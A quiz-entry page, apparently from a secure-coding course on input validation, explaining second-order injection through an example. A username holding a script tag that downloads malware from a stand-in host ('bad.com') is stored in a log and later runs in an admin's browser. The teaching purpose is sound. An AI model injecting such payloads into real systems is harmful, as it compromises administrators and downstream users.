\nSystem stores this in a log file\nLater, an admin views the log in their browser\nThe script executes in admin's context, downloading malware\n\nThe payload doesn't affect the original system but targets downstream users/systems.\n", "dateModified": "2026-06-20T10:50:15+00:00" } } }

LOGBOOK

HELP

Quiz Entry - updated: 2026.06.20

What is a 2nd order injection attack?

The payload is stored harmlessly first, then fires later when some other component or user processes it.

2nd order injection stores a malicious payload that executes later on a different system or user — so input that looked safe on the way in becomes dangerous on the way back out.

Example:

  1. Attacker submits username: <script>$.download("http://bad.com/malware.exe")</script>
  2. System stores this in a log file
  3. Later, an admin views the log in their browser
  4. The script executes in admin's context, downloading malware

The payload doesn't affect the original system but targets downstream users/systems.

From Quiz: SPRG / Input Validation & Output Encoding | Updated: Jun 20, 2026